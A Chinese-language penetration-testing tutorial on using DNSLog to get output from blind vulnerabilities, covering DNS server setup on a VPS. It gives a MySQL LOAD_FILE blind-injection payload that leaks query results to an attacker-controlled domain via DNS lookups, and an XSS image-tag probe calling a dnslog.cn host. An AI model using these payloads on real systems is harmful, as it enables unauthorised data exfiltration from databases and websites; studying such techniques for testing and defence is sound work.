目录
在渗透测试中,当我们碰到无回显的漏洞是非常难利用的。一是我们不知道存不存在漏洞,二是我们不知道漏洞执行的结果。因此,针对无回显的漏洞,我们可以通过使用DNSLog来进行回显。DNSLog是一种回显机制,攻击者可以通过DNS的解析日志来读取漏洞执行的回显结果。
DNSLog
首先,我们都知道DNS的解析过程,递归查询和迭代查询相结合,传送门:DNS解析过程
这里我们可以控制的是域名的DNS服务器,也就是如下的 "baidu.com" 的DNS服务器。我们只需要搭建一个的DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级三级甚至更多级的子域名上去请求,就可以通过DNS解析日志来获取到它们。
DNSLog部署过程:
- 申请一个域名,如 xie.com
- 在我们的VPS上安装并配置DNS服务器
- 将 xie.com 的DNS服务器设置为我们的VPS地址
- 这样,所有访问 xie.com 的二级三级四级等等子域名都会被解析到我们的VPS上。我们就可以通过查询DNS解析记录来获得命令执行的回显了。
SQL盲注回显
不管是布尔类型盲注还是时间盲注,都需要发送大量的数据包去判断数据,而这很可能会触发WAF的防护,因此导致被封IP。所以,如果条件允许,我们可以结合DNSlog来快速的回显数据。MySQL数据库,通过DNSlog盲注需要用到 load_file() 函数,该函数不仅能加载本地文件,同时也能对URL发起请求。因为需要使用 load_file() 函数,所以需要root权限,并且 secure_file_priv 需要为空。传送门:MySQL数据库中的文件操作函数(load_file()、into outfile、into dumpfile)
Payload如下:
SELECT LOAD_FILE(CONCAT('\\\\',(要查询的语句),'.xx.xx.xx\\abc'));
执行的语句
DNSLog平台收到的DNS查询
无回显的XSS
payload
<img src=http://hf8r67.dnslog.cn>
DNSLog平台收到的DNS查询
即可证明存在XSS
更多盲打Payload
更多漏洞的Payload,查看ceye的后台,